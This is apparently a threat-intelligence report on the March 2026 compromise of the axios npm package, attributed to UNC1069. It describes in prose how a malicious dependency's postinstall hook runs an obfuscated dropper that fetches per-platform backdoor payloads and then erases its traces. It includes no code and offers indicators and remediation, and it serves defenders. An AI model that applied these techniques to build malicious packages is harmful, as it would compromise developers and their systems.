North Korea-Linked UNC1069 Compromises Axios npm Package in Supply Chain Attack
Mandiant has identified a supply chain attack on the widely used Axios npm package, with North Korea-nexus threat actor UNC1069 injecting malicious code that deploys the WAVESHAPER.V2 backdoor across Windows, macOS, and Linux.
Google Threat Intelligence Group (GTIG) has disclosed an active software supply chain attack targeting the popular Node Package Manager (NPM) package 'axios.' Between March 31, 2026, 00:21 and 03:20 UTC, an attacker introduced a malicious dependency named 'plain-crypto-js' into axios NPM releases versions 1.14.1 and 0.30.4. Axios is the most popular JavaScript library used to simplify HTTP requests, and these packages typically have over 100 million and 83 million weekly downloads, respectively. This malicious dependency is an obfuscated dropper that deploys the WAVESHAPER.V2 backdoor across Windows, macOS, and Linux.
GTIG attributes this activity to UNC1069, a financially motivated North Korea-nexus threat actor active since at least 2018, based on the use of WAVESHAPER.V2, an updated version of WAVESHAPER previously used by this threat actor. Further, analysis of infrastructure artifacts used in this attack shows overlaps with infrastructure used by UNC1069 in past activities. The maintainer account associated with the axios package was compromised, with the associated email address changed to an attacker-controlled account (ifstap@proton.me).
The threat actor used the postinstall hook within the 'package.json' file of the malicious dependency to achieve silent execution. Upon installation of the compromised axios package, NPM automatically executes an obfuscated JavaScript dropper named 'setup.js' in the background. The plain-crypto-js package serves as a payload delivery vehicle. The core component, SILKBELL, setup.js (SHA256: e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09), dynamically checks the target system's operating system upon execution to deliver platform-specific payloads.
The script uses a custom XOR and Base64-based string obfuscation routine to conceal the command-and-control (C2 or C&C) URL and host OS execution commands. To evade static analysis, it dynamically loads fs, os, and execSync. After successfully dropping the secondary payload, setup.js attempts to delete itself and revert the modified package.json to hide forensic traces of the postinstall hook.
Depending on the identified platform, the dropper executes different routines. On Windows, it hunts for the native powershell.exe binary, copies it to evade detection, and downloads a PowerShell script via curl. On macOS, the malware uses bash and curl to download a native Mach-O binary payload to /Library/Caches/com.apple.act.mond. On Linux, the script downloads a Python backdoor to /tmp/ld.py. The platform-specific payloads ultimately deploy variants of a backdoor tracked by GTIG as WAVESHAPER.V2, a backdoor written in C++ that targets macOS to collect system information, enumerate directories, or execute additional payloads and that connects to the C2 provided via command-line arguments.
Notably, GTIG identified additional variants of WAVESHAPER.V2 written in PowerShell and Python to target diverse environments. Regardless of the operating system, the malware beacons to the C2 endpoint over port 8000 at 60-second intervals. The beacon consists of Base64-encoded JSON data and uses a hard-coded User-Agent. Following the initial beaconing to the adversary infrastructure, WAVESHAPER.V2 continuously polls, pausing for 60 seconds awaiting instructions. The server response determines the next action taken by the implant, supporting commands such as 'kill' to terminate execution and 'rundir' to retrieve detailed directory listings.
This attack underscores the persistent threat to the open-source software supply chain, particularly targeting widely used packages like Axios. Organizations using Axios versions 1.14.1 and 0.30.4 should immediately audit their dependencies, update to a patched version, and review for signs of compromise. The involvement of a North Korea-nexus actor highlights the geopolitical dimensions of such attacks, where financially motivated groups leverage supply chain access for espionage and credential theft.